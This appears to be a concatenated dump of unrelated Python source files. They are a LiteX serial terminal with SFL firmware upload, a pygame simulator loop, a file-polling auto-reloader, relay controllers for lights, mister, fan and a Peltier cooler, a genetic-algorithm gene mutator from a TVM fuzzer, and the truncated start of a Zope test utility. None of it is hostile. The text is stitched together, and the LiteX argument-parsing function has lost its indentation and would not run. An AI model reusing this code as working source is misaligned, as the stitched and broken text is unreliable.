0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
]
def crc16(l):
    """Return the CRC-16/CCITT (XMODEM) checksum of an iterable of bytes."""
    checksum = 0
    for byte in l:
        # Table-driven update: fold the next byte into the running CRC.
        checksum = crc16_table[((checksum >> 8) ^ byte) & 0xff] ^ (checksum << 8)
    return checksum & 0xffff
# LiteXTerm ----------------------------------------------------------------------------------------
class LiteXTerm:
    """Serial console for LiteX SoCs that also answers the BIOS serial-boot
    handshake and uploads kernel/firmware images over the SFL protocol."""
    def __init__(self, serial_boot, kernel_image, kernel_address, json_images, safe):
        self.serial_boot = serial_boot
        # A single kernel image and a JSON image list are mutually exclusive.
        assert not (kernel_image is not None and json_images is not None)
        self.mem_regions = {}
        if kernel_image is not None:
            self.mem_regions = {kernel_image: kernel_address}
            self.boot_address = kernel_address
        if json_images is not None:
            f = open(json_images, "r")
            json_dir = os.path.dirname(json_images)
            # Image paths in the JSON are relative to the JSON file's directory.
            for k, v in json.load(f).items():
                self.mem_regions[os.path.join(json_dir, k)] = v
            # Boot address comes from the last image listed (relies on dict
            # insertion order).
            self.boot_address = self.mem_regions[list(self.mem_regions.keys())[-1]]
            f.close()
        self.reader_alive = False
        self.writer_alive = False
        # Sliding windows of the most recent received bytes, compared against
        # the SFL prompt / magic request strings in detect_prompt/detect_magic.
        self.prompt_detect_buffer = bytes(len(sfl_prompt_req))
        self.magic_detect_buffer = bytes(len(sfl_magic_req))
        self.console = Console()
        signal.signal(signal.SIGINT, self.sigint)
        self.sigint_time_last = 0
        # Upload pacing; recalibrated by upload_calibration() unless --safe.
        self.safe = safe
        self.delay = 0
        self.length = 64
        self.outstanding = 0 if safe else 128
    def open(self, port, baudrate):
        """Open the serial port (no-op if already open)."""
        if hasattr(self, "port"):
            return
        self.port = serial.serial_for_url(port, baudrate)
    def close(self):
        """Close the serial port (no-op if not open)."""
        if not hasattr(self, "port"):
            return
        self.port.close()
        del self.port
    def sigint(self, sig, frame):
        """SIGINT handler: forward CTRL-C to the device; double CTRL-C exits."""
        if hasattr(self, "port"):
            self.port.write(b"\x03")
        sigint_time_current = time.time()
        # Exit term if 2 CTRL-C pressed in less than 0.5s.
        if (sigint_time_current - self.sigint_time_last < 0.5):
            self.console.unconfigure()
            self.close()
            sys.exit()
        else:
            self.sigint_time_last = sigint_time_current
    def send_frame(self, frame):
        """Send one SFL frame, retrying on CRC errors.

        Returns 1 on success, 0 on an unknown device reply."""
        retry = 1
        while retry:
            self.port.write(frame.encode())
            # Get the reply from the device
            reply = self.port.read()
            if reply == sfl_ack_success:
                retry = 0
            elif reply == sfl_ack_crcerror:
                retry = 1
            else:
                print("[LITEX-TERM] Got unknown reply '{}' from the device, aborting.".format(reply))
                return 0
        return 1
    def receive_upload_response(self):
        """Read one upload ack: True on success, falsy (None) on CRC error;
        exits the process on any other reply."""
        reply = self.port.read()
        if reply == sfl_ack_success:
            return True
        elif reply == sfl_ack_crcerror:
            # NOTE(review): this branch falls through and returns None; the
            # caller only decrements its outstanding count on a truthy ack.
            print("[LITEX-TERM] Upload to device failed due to data corruption (CRC error)")
        else:
            print(f"[LITEX-TERM] Got unexpected response from device '{reply}'")
            sys.exit(1)
    def upload_calibration(self, address):
        """Probe an inter-frame delay the device can sustain by blasting test
        frames; falls back to safe settings when nothing works."""
        print("[LITEX-TERM] Upload calibration... ", end="")
        sys.stdout.flush()
        # Calibration parameters.
        min_delay = 1e-5
        max_delay = 1e-3
        nframes = 16
        length_range = [64]
        # Run calibration with increasing delay and decreasing length.
        delay = min_delay
        working_delay = None
        working_length = None
        while delay <= max_delay:
            for length in length_range:
                #p0rint(f"delay {delay}, length {length}")
                # Prepare frame.
                frame = SFLFrame()
                frame.cmd = sfl_cmd_load
                frame_data = bytearray(min(length, sfl_payload_length-4))
                frame.payload = address.to_bytes(4, "big")
                frame.payload += frame_data
                frame = frame.encode()
                # Send N consecutive frames.
                for i in range(nframes):
                    self.port.write(frame)
                    time.sleep(delay)
                # Wait and get acks.
                working = True
                time.sleep(0.2)
                while self.port.in_waiting:
                    ack = self.port.read()
                    #print(ack)
                    if ack in [sfl_ack_error, sfl_ack_crcerror]:
                        working = False
                if working:
                    # Save working delay/length and exit.
                    working_delay = delay
                    working_length = min(length, sfl_payload_length - 4)
                    break
            # Exit if working delay found.
            if (working_delay is not None):
                break
            # Else increase delay.
            delay = delay*2
        # Set parameters.
        if (working_delay is not None):
            print(f"(inter-frame: {working_delay*1e6:5.2f}us, length: {working_length})")
            self.delay = working_delay
            self.length = working_length
        else:
            print("failed, switching to --safe mode.")
            self.delay = 0
            self.length = 64
            self.outstanding = 0
    def upload(self, filename, address):
        """Upload *filename* to *address* over SFL; returns the byte count."""
        f = open(filename, "rb")
        # Seek to the end to learn the file size, then rewind.
        f.seek(0, 2)
        length = f.tell()
        f.seek(0, 0)
        # NOTE(review): prints the literal text "(unknown)"; presumably this
        # was meant to interpolate {filename} — confirm before changing.
        print(f"[LITEX-TERM] Uploading (unknown) to 0x{address:08x} ({length} bytes)...")
        # Upload calibration
        if not self.safe:
            self.upload_calibration(address)
        # Force safe mode settings when calibration fails.
        # NOTE(review): self.delay is initialized to 0 and calibration assigns
        # a float or 0, so this None check appears to never fire as written.
        if self.delay is None:
            self.delay = 0
            self.length = 64
            self.outstanding = 0
        # Prepare parameters
        current_address = address
        position = 0
        start = time.time()
        remaining = length
        outstanding = 0
        while remaining:
            # Show progress
            sys.stdout.write("|{}>{}| {}%\r".format(
                "=" * (20*position//length),
                " " * (20-20*position//length),
                100*position//length))
            sys.stdout.flush()
            # Send frame if max outstanding not reached.
            if outstanding <= self.outstanding:
                # Prepare frame.
                frame = SFLFrame()
                frame.cmd = sfl_cmd_load
                frame_data = f.read(min(remaining, self.length-4))
                frame.payload = current_address.to_bytes(4, "big")
                frame.payload += frame_data
                # Encode frame and send it.
                self.port.write(frame.encode())
                # Update parameters
                current_address += len(frame_data)
                position += len(frame_data)
                remaining -= len(frame_data)
                outstanding += 1
            # Inter-frame delay.
            time.sleep(self.delay)
            # Read response if available (at most one ack per iteration; the
            # unconditional break below exits after the first read).
            while self.port.in_waiting:
                ack = self.receive_upload_response()
                if ack:
                    outstanding -= 1
                break
        # Get remaining responses.
        for _ in range(outstanding):
            self.receive_upload_response()
        # Compute speed.
        end = time.time()
        elapsed = end - start
        print("[LITEX-TERM] Upload complete ({0:.1f}KB/s).".format(length/(elapsed*1024)))
        f.close()
        return length
    def boot(self):
        """Send the SFL jump command to boot_address (a hex string)."""
        print("[LITEX-TERM] Booting the device.")
        frame = SFLFrame()
        frame.cmd = sfl_cmd_jump
        frame.payload = int(self.boot_address, 16).to_bytes(4, "big")
        self.send_frame(frame)
    def detect_prompt(self, data):
        """Slide *data* into the prompt window; True when it matches."""
        if len(data):
            self.prompt_detect_buffer = self.prompt_detect_buffer[1:] + data
            return self.prompt_detect_buffer == sfl_prompt_req
        else:
            return False
    def answer_prompt(self):
        """Acknowledge the device's serial-boot prompt."""
        print("[LITEX-TERM] Received serial boot prompt from the device.")
        self.port.write(sfl_prompt_ack)
    def detect_magic(self, data):
        """Slide *data* into the magic window; True when it matches."""
        if len(data):
            self.magic_detect_buffer = self.magic_detect_buffer[1:] + data
            return self.magic_detect_buffer == sfl_magic_req
        else:
            return False
    def answer_magic(self):
        """Upload all configured images, then boot the device."""
        print("[LITEX-TERM] Received firmware download request from the device.")
        if(len(self.mem_regions)):
            self.port.write(sfl_magic_ack)
        for filename, base in self.mem_regions.items():
            self.upload(filename, int(base, 16))
        self.boot()
        print("[LITEX-TERM] Done.")
    def reader(self):
        """Reader thread: pump device bytes to stdout, watching for the boot
        prompt / firmware download request."""
        try:
            while self.reader_alive:
                c = self.port.read()
                sys.stdout.buffer.write(c)
                sys.stdout.flush()
                if len(self.mem_regions):
                    if self.serial_boot and self.detect_prompt(c):
                        self.answer_prompt()
                    if self.detect_magic(c):
                        self.answer_magic()
        except serial.SerialException:
            self.reader_alive = False
            self.console.unconfigure()
            raise
    def start_reader(self):
        """Start the reader thread (daemonized so it won't block exit)."""
        self.reader_alive = True
        self.reader_thread = threading.Thread(target=self.reader)
        # NOTE(review): setDaemon() is deprecated; daemon=True is the modern spelling.
        self.reader_thread.setDaemon(True)
        self.reader_thread.start()
    def stop_reader(self):
        """Ask the reader thread to stop and wait for it."""
        self.reader_alive = False
        self.reader_thread.join()
    def writer(self):
        """Writer thread: pump console keystrokes to the device."""
        try:
            while self.writer_alive:
                b = self.console.getkey()
                if b == b"\x03":
                    self.stop()
                elif b == b"\n":
                    self.port.write(b"\x0a")
                elif self.console.escape_char(b):
                    b = self.console.getkey()
                    ansi_seq = self.console.handle_escape(b)
                    self.port.write(ansi_seq)
                else:
                    self.port.write(b)
        # NOTE(review): bare except also catches SystemExit/KeyboardInterrupt
        # before re-raising; "except BaseException" would be clearer.
        except:
            self.writer_alive = False
            self.console.unconfigure()
            raise
    def start_writer(self):
        """Start the writer thread (daemonized so it won't block exit)."""
        self.writer_alive = True
        self.writer_thread = threading.Thread(target=self.writer)
        self.writer_thread.setDaemon(True)
        self.writer_thread.start()
    def stop_writer(self):
        """Ask the writer thread to stop and wait for it."""
        self.writer_alive = False
        self.writer_thread.join()
    def start(self):
        """Start both pump threads."""
        self.start_reader()
        self.start_writer()
    def stop(self):
        """Request both pump threads to exit on their next loop check."""
        self.reader_alive = False
        self.writer_alive = False
    def join(self, writer_only=False):
        """Block until the writer (and optionally the reader) finishes."""
        self.writer_thread.join()
        if not writer_only:
            self.reader_thread.join()
# Run ----------------------------------------------------------------------------------------------
def _get_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("port", help="Serial port (eg /dev/tty*, crossover, jtag).")
parser.add_argument("--speed", default=115200, help="Serial baudrate.")
parser.add_argument("--serial-boot", default=False, action='store_true', help="Automatically initiate serial boot.")
parser.add_argument("--kernel", default=None, help="Kernel image.")
parser.add_argument("--kernel-adr", default="0x40000000", help="Kernel address.")
parser.add_argument("--images", default=None, help="JSON description of the images to load to memory.")
parser.add_argument("--safe", action="store_true", help="Safe serial boot mode, disable upload speed optimizations.")
parser.add_argument("--csr-csv", default=None, help="SoC CSV file.")
parser.add_argument("--base-address", default=None, help="CSR base address.")
parser.add_argument("--crossover-name", default="uart_xover", help="Crossover UART name to use (present in design/csr.csv).")
parser.add_argument("--jtag-name", default="jtag_uart", help="JTAG UART type (jtag_uart).")
parser.add_argument("--jtag-config", default="openocd_xc7_ft2232.cfg", help="OpenOCD JTAG configuration file for jtag_uart.")
parser.add_argument("--jtag-chain", default=1, help="JTAG chain.")
return parser.parse_args()
def main():
    """CLI entry point: build the terminal, resolve the port, run the console."""
    args = _get_args()
    term = LiteXTerm(args.serial_boot, args.kernel, args.kernel_adr, args.images, args.safe)
    # Crossover/JTAG bridges rely on PTYs, which are unavailable on Windows.
    if sys.platform == "win32" and args.port in ["crossover", "jtag"]:
        raise NotImplementedError
    if args.port == "crossover":
        base_address = None if args.base_address is None else int(args.base_address)
        xover = CrossoverUART(base_address=base_address, csr_csv=args.csr_csv, name=args.crossover_name)
        xover.open()
        port = os.ttyname(xover.name)
    elif args.port == "jtag":
        if args.jtag_name != "jtag_uart":
            raise NotImplementedError
        jtag_uart = JTAGUART(config=args.jtag_config, chain=int(args.jtag_chain))
        jtag_uart.open()
        port = os.ttyname(jtag_uart.name)
    else:
        # A plain serial device path/URL is used as-is.
        port = args.port
    term.open(port, int(float(args.speed)))
    term.console.configure()
    term.start()
    term.join(True)
if __name__ == "__main__":
    main()
|
simulator.py | import threading
import pygame
from .arenas import TCRArena
from .display import Display
# Arena used when the config dict does not name a game.
DEFAULT_GAME = 'tin-can-rally'
# Registry mapping game names to their arena classes.
GAMES = {'tin-can-rally': TCRArena,
         }
class Simulator(object):
    """Owns an arena and its display and drives the pygame loop, either on a
    background daemon thread (background=True) or via run() on the caller's
    thread.

    Changes: the try/KeyError/del dance is replaced by dict.pop (same
    behavior, including removing 'game' from the caller's dict), and the
    deprecated Thread.setDaemon() is replaced by the daemon= constructor
    argument.
    """

    def __init__(self, config=None, size=(8, 8), frames_per_second=30, background=True):
        # NOTE(review): `size` is currently unused; kept for interface
        # compatibility — confirm whether it should reach the arena.
        if config is None:
            config = dict()
        # Remove 'game' from config (remaining keys go to the arena ctor);
        # fall back to the default game when absent.
        game_name = config.pop('game', DEFAULT_GAME)
        game = GAMES[game_name]
        self.arena = game(**config)
        self.display = Display(self.arena)
        self.background = background
        self.frames_per_second = frames_per_second
        if self.background:
            self._loop_thread = threading.Thread(
                target=self._main_loop, args=(frames_per_second,), daemon=True)
            self._loop_thread.start()

    def run(self):
        """Run the simulation loop on the calling thread.

        Raises RuntimeError if the simulator was started with background=True
        (the loop is already running on its own thread)."""
        if self.background:
            raise RuntimeError(
                'Simulator runs in the background. Try passing background=False')
        self._main_loop(self.frames_per_second)

    def _main_loop(self, frames_per_second):
        """Tick the display at the requested rate until the window is closed
        or ESC is pressed."""
        clock = pygame.time.Clock()
        while True:
            if any(event.type == pygame.QUIT
                   or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE)
                   for event in pygame.event.get()):
                break
            self.display.tick(1 / frames_per_second)
            clock.tick(frames_per_second)
        pygame.quit()
|
statreload.py | import multiprocessing
import os
import signal
import sys
import time
from pathlib import Path
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
class StatReload:
    """Polling (stat-based) auto-reloader.

    Runs *target* in a spawned subprocess and restarts it whenever the mtime
    of a watched .py file increases. Shutdown is requested via handle_exit
    (installed as a signal handler in run()).
    """

    def __init__(self, config):
        # config provides .logger_instance and .reload_dirs.
        self.config = config
        self.should_exit = False
        self.reload_count = 0
        # filename -> last observed st_mtime
        self.mtimes = {}

    def handle_exit(self, sig, frame):
        """Signal handler: request a clean shutdown of the reload loop."""
        self.should_exit = True

    @staticmethod
    def handle_fds(target, fd_stdin, **kwargs):
        """Handle stdin in subprocess for pdb."""
        sys.stdin = os.fdopen(fd_stdin)
        target(**kwargs)

    def run(self, target, *args, **kwargs):
        """Supervise *target*: spawn it, poll for changes, restart on change."""
        pid = os.getpid()
        logger = self.config.logger_instance
        logger.info("Started reloader process [{}]".format(pid))
        for sig in HANDLED_SIGNALS:
            signal.signal(sig, self.handle_exit)

        def get_subprocess():
            # "spawn" keeps the child free of inherited interpreter state.
            spawn = multiprocessing.get_context("spawn")
            return spawn.Process(
                target=self.handle_fds, args=(target, sys.stdin.fileno()), kwargs=kwargs
            )

        process = get_subprocess()
        process.start()
        while process.is_alive() and not self.should_exit:
            time.sleep(0.3)
            if self.should_restart():
                self.clear()
                os.kill(process.pid, signal.SIGTERM)
                process.join()
                process = get_subprocess()
                process.start()
                self.reload_count += 1
        logger.info("Stopping reloader process [{}]".format(pid))

    def clear(self):
        """Forget all recorded mtimes (forces a fresh baseline)."""
        self.mtimes = {}

    def should_restart(self):
        """Return True when any watched file's mtime increased since last seen."""
        for filename in self.iter_py_files():
            try:
                mtime = os.stat(filename).st_mtime
            except OSError:  # pragma: nocover
                # File vanished between listing and stat; ignore it.
                continue
            old_time = self.mtimes.get(filename)
            if old_time is None:
                # First sighting is a baseline, not a change.
                self.mtimes[filename] = mtime
            elif mtime > old_time:
                display_path = os.path.normpath(filename)
                if Path.cwd() in Path(filename).parents:
                    display_path = os.path.normpath(os.path.relpath(filename))
                message = "Detected file change in '%s'. Reloading..."
                self.config.logger_instance.warning(message, display_path)
                return True
        return False

    def iter_py_files(self):
        """Yield every .py file under the configured reload directories."""
        for reload_dir in self.config.reload_dirs:
            for subdir, dirs, files in os.walk(reload_dir):
                for file in files:
                    if file.endswith(".py"):
                        yield os.path.join(subdir, file)
|
managerHardware.py | from backendRelay import Relay
from backendTimerUtils import IndefiniteTimer, time_in_range
from threading import Thread
from time import sleep
from statistics import mean
import datetime
class Lights(Relay):
    """Relay-controlled lights, optionally driven by a daily on/off window."""

    def __init__(self, relaystring, gpiomanager, camera):
        super(Lights, self).__init__(relaystring, "Lights", gpiomanager)
        self.camera = camera

    def inrangeON(self):
        """Sync light state (and the camera sentinel) with the schedule window."""
        now = datetime.datetime.now().time()
        in_window = time_in_range(self.ton, self.toff, now)
        # The camera only records while the lights window is active.
        self.camera.sentinel = in_window
        # Only toggle the relay on a state change.
        if in_window and not self.ison:
            self.on()
        elif not in_window and self.ison:
            self.off()

    def startscheduledlighting(self, ton=(8, 0), toff=(22, 0)):
        """Poll every 10 s, keeping the lights on inside [ton, toff)."""
        self.ton = datetime.time(*ton)
        self.toff = datetime.time(*toff)
        self.lightschedule = IndefiniteTimer(10, self.inrangeON)
        self.lightschedulethread = Thread(target=self.lightschedule.start_all)
        self.lightschedulethread.start()
class Mister(Relay):
    """Relay-controlled mister that runs periodic misting cycles."""

    def __init__(self, relaystring, gpiomanager):
        super(Mister, self).__init__(relaystring, "Mister", gpiomanager)

    def onemistingcycle(self):
        """Run the mister for up to forNsec seconds, stopping early when the
        schedule's sentinel is cleared."""
        self.on()
        ticks = 10 * self.forNsec  # poll the sentinel at 0.1 s granularity
        for _ in range(ticks):
            if not self.misterschedule.sentinel:
                break
            sleep(0.1)
        self.off()

    def startscheduledmisting(self, everyNsec=60, forNsec=25):
        """Mist for forNsec seconds every everyNsec seconds."""
        assert everyNsec > forNsec, "Time misting must be less than time between misting cycles."
        self.everyNsec = everyNsec
        self.forNsec = forNsec
        self.misterschedule = IndefiniteTimer(self.everyNsec, self.onemistingcycle)
        self.misterschedulethread = Thread(target=self.misterschedule.start_all)
        self.misterschedulethread.start()
class Fan(Relay):
    """Relay-controlled ventilation fan run on a periodic schedule."""

    def __init__(self, relaystring, gpiomanager):
        super(Fan, self).__init__(relaystring, "Fan", gpiomanager)

    def onefancycle(self):
        """Run the fan for up to forNsec seconds, stopping early when the
        schedule's sentinel is cleared."""
        self.on()
        for i in range(10*self.forNsec):  # poll sentinel at 0.1 s granularity
            if self.fanschedule.sentinel:
                sleep(0.1)
            else:
                break
        self.off()

    def startscheduledfanning(self, everyNsec=3600, forNsec=45):
        """Fan for forNsec seconds every everyNsec seconds.

        Fixed: the previous defaults (everyNsec=1, forNsec=45) always violated
        the assertion below, so calling with defaults raised AssertionError.
        Hourly cadence chosen to satisfy the invariant — TODO confirm the
        intended schedule.
        """
        assert everyNsec > forNsec, "Time fanning must be less than time between fan cycles."
        self.everyNsec = everyNsec
        self.forNsec = forNsec
        # everyNsec fan forNsec
        self.fanschedule = IndefiniteTimer(self.everyNsec, self.onefancycle)
        self.fanschedulethread = Thread(target=self.fanschedule.start_all)
        self.fanschedulethread.start()
class Peltier(Relay):
    """Relay-controlled Peltier cooler driven by a smoothed temperature.

    Keeps a circular buffer of recent readings and switches the relay on
    when the rolling mean exceeds ``ontemp``.
    """

    def __init__(self, relaystring, gpiomanager, ontemp=20, bufferlen=10):
        super(Peltier, self).__init__(relaystring, "Peltier", gpiomanager)
        self.bufferlen = bufferlen
        self.bufferindex = 0
        self.circlebuffer = [0]*self.bufferlen
        self.ontemp = ontemp

    def updatefromtemp(self, rtemp):
        """Record a reading and switch based on the rolling mean vs ontemp.

        Fixed two defects: the method was missing its ``self`` parameter
        (so it could never be called on an instance), and ``self.off`` was
        referenced without parentheses so the relay was never switched off.
        """
        self.circlebuffer[self.bufferindex % self.bufferlen] = rtemp
        self.bufferindex += 1
        if mean(self.circlebuffer) > self.ontemp:
            self.on()
        else:
            self.off()
|
gene.py | from dataclasses import is_dataclass
from random import choice, randint, random, sample, shuffle
from time import time
from multiprocessing import Process, Manager
from tzer.error import MaybeDeadLoop, RuntimeFailure
from tzer.template import execute_both_mode
from tzer.seed_eval import SimpleLSTMEvaluator
from tzer.context import _RELAY_FUNCTION_HARD_PASSES_
try:
from tvm.contrib import coverage
except Exception as e:
print(f'No coverage in linked TVM. {e}')
class Genes:
    """A mutable gene sequence plus an auxiliary gene pool used when
    synthesizing fresh material for mutation."""

    def __init__(self, genes, other_genes=None):
        self.genes = genes
        # Created per instance: the previous ``other_genes=[]`` default was a
        # shared mutable default, so every instance aliased the same list.
        self.other_genes = [] if other_genes is None else other_genes

    def set_other_genes(self, other_genes):
        """Replace the auxiliary gene pool.

        Renamed from ``other_genes``: a method with the same name as the
        instance attribute assigned in __init__ was shadowed by that
        attribute and could never be called on an instance.
        """
        self.other_genes = other_genes

    def new(self):
        """Return a random gene list drawn from both pools.

        NOTE(review): raises ValueError when both pools are empty
        (randint(1, 0)) — confirm callers guarantee non-empty pools.
        """
        possible_genes = self.genes + self.other_genes
        return [choice(possible_genes) for _ in range(randint(1, len(possible_genes)))]

    def add(self, new_genes):
        """Insert new_genes at a random position (whole list if empty)."""
        genes_length = len(self.genes)
        if genes_length >= 1:
            pos = randint(0, genes_length - 1)
            self.genes = self.genes[:pos] + new_genes + self.genes[pos:]
        else:
            self.genes = new_genes

    def delete(self):
        """Remove a random contiguous slice of the gene sequence."""
        genes_length = len(self.genes)
        if genes_length >= 1:
            start_pos = randint(0, genes_length - 1)
            end_pos = randint(start_pos, genes_length - 1)
            self.genes = self.genes[:start_pos] + self.genes[end_pos + 1:]
        else:
            self.genes = []

    def replace(self, new_genes):
        """Replace a random contiguous slice with new_genes."""
        genes_length = len(self.genes)
        if genes_length >= 1:
            start_pos = randint(0, genes_length - 1)
            end_pos = randint(start_pos, genes_length - 1)
            self.genes = self.genes[:start_pos] + new_genes + self.genes[end_pos + 1:]

    def mutate(self, new_genes):
        """Apply one random mutation (add/delete/replace, 0.25 each).

        Returns True when a mutation was actually applied (c < 0.75)."""
        c = random()
        if c < 0.25:
            self.add(new_genes)
        elif c < 0.5:
            self.delete()
        elif c < 0.75:
            self.replace(new_genes)
        return c < 0.75

    # crossover operators --------------------------------------------------
    def exchage(self, other):
        """Swap whole gene lists (misspelled name kept for API compatibility)."""
        self.genes, other.genes = other.genes, self.genes

    def pairwise_exchange(self, other):
        """Swap genes at every even index of the common prefix."""
        length = min(len(self.genes), len(other.genes))
        for i in range(0, length, 2):
            self.genes[i], other.genes[i] = other.genes[i], self.genes[i]

    def splice(self, other):
        """Cut both sequences at the common midpoint and shuffle the parts."""
        length = min(len(self.genes), len(other.genes))
        mid = length // 2
        parts = [self.genes[:mid], self.genes[mid:], other.genes[:mid], other.genes[mid:]]
        shuffle(parts)
        self.genes = parts[0] + parts[1]
        other.genes = parts[2] + parts[3]

    def crossover(self, other):
        """Apply one random crossover (exchange/pairwise/splice, 0.25 each).

        Returns True when a crossover was actually applied (c < 0.75)."""
        c = random()
        if c < 0.25:
            self.exchage(other)
        elif c < 0.5:
            self.pairwise_exchange(other)
        elif c < 0.75:
            self.splice(other)
        return c < 0.75
# Stable integer id for each hard Relay pass (used as model vocabulary).
pass_to_id = {p: i for i, p in enumerate(_RELAY_FUNCTION_HARD_PASSES_)}
# Shared seed evaluator sized to the number of known passes.
evaluator = SimpleLSTMEvaluator(len(_RELAY_FUNCTION_HARD_PASSES_))
class Genotype:
    """One GA population member: a list of Genes groups plus bookkeeping
    (coverage, timing, errors) filled in when the candidate is executed."""
    def __init__(self, member_no):
        self._generation = 0
        self.member_no = member_no
        self._fitness = -1
        self._max_depth = 0
        # Results of the last evaluation.
        self.err = ""
        self.out = ""
        self.score = 0
        # Gene groups; genes_length caches the total gene count across groups.
        self.genes_list = []
        self.genes_length = 0
        self._initial_member_no = -1
        self.execute_time = -1
        self.timeout = 600
        # Coverage totals: cur_cov = absolute after run, inc_cov = delta.
        self.cur_cov = 0
        self.inc_cov = 0
        self.exitcode = 0
    def set_genes_list(self, genes_list):
        """Replace the gene groups and recompute the cached total length."""
        self.genes_list = genes_list
        self.genes_length = sum([len(i.genes) for i in genes_list])
    def append_genes(self, genes, other_genes):
        """Wrap raw gene lists in a Genes container and append it."""
        genes = Genes(genes, other_genes)
        self.genes_list.append(genes)
        self.genes_length += len(genes.genes)
    def get_fitness(self):
        """Fitness is the absolute coverage reached by the last evaluation."""
        return self.cur_cov
    def mutate(self):
        """Mutate every gene group; True when any mutation was applied."""
        status = False
        for genes in self.genes_list:
            new_gene = genes.new()
            status |= genes.mutate(new_gene)
        return status
    def crossover(self, other):
        """Cross over paired gene groups; True when any crossover applied."""
        status = False
        for genes1, genes2 in zip(self.genes_list, other.genes_list):
            status |= genes1.crossover(genes2)
        return status
    def evaluate(self):
        """Execute the candidate (self.ctx) and record coverage/timing.

        Relies on the coverage push/pop stack, so statement order here is
        significant. NOTE(review): self.ctx is assigned elsewhere — confirm
        it is always set before evaluate() is called.
        """
        old_coverage = coverage.get_now()
        coverage.push()
        start_time = time()
        try:
            execute_both_mode(self.ctx)
        except Exception as e:
            self.err = e
        self.cur_cov = coverage.get_now()
        self.execute_time = time() - start_time
        coverage.pop()
        self.inc_cov = coverage.get_now() - old_coverage
        # The block below is an earlier subprocess-isolated variant of this
        # method, kept for reference (enforced the timeout via Process.join).
        # manager = Manager()
        # return_dict = manager.dict()
        # old_coverage = coverage.get_now()
        # def run(ctx, return_dict):
        #     coverage.push()
        #     start_time = time()
        #     return_dict['err'] = ''
        #     try:
        #         execute_both_mode(ctx)
        #     except Exception as e:
        #         return_dict['err'] = e
        #     return_dict['cur_cov'] = coverage.get_now()
        #     return_dict['execute_time'] = time() - start_time
        #     coverage.pop()
        #     return_dict['cov'] = coverage.get_now()
        #     return_dict['hitmap'] = coverage.get_hitmap()
        # p = Process(target=run, args=(self.ctx, return_dict))
        # p.start()
        # p.join(timeout=self.timeout)
        # if p.is_alive():
        #     p.terminate()
        #     self.execute_time = self.timeout
        #     self.err = MaybeDeadLoop()
        # else:
        #     self.exitcode = p.exitcode
        #     if p.exitcode > 0:
        #         if self.err == None:
        #             self.err = RuntimeFailure()
        # if 'cur_cov' in return_dict:
        #     self.cur_cov = return_dict['cur_cov']
        # if 'err' in return_dict:
        #     self.err = return_dict['err']
        # if 'execute_time' in return_dict:
        #     self.execute_time = return_dict['execute_time']
        # if 'cov' in return_dict:
        #     coverage.set_now(return_dict['cov'])
        # if 'hitmap' in return_dict:
        #     coverage.set_hitmap(return_dict['hitmap'])
        # self.inc_cov = coverage.get_now() - old_coverage
|
utils.py | import sys
import os.path
import random
import socket
import threading
from paste.deploy import loadapp
from paste.httpserver import serve
def get_interfaces(obj):
    """Return the interfaces provided by *obj* as a list."""
    return list(obj.__provides__.interfaces())
# used on testing
# copied from ZopeLite Class from zope.testingZope.TestCase
# but we can't import it
# if we do we polluate our os.environment and ZopeTestcase usecase detction
def _print(msg):
'''Writes 'msg' to stderr and flushes the stream.'''
sys.stderr.write(msg)
sys.stderr.flush()
# Optional zope test helpers: any import/registration failure silently
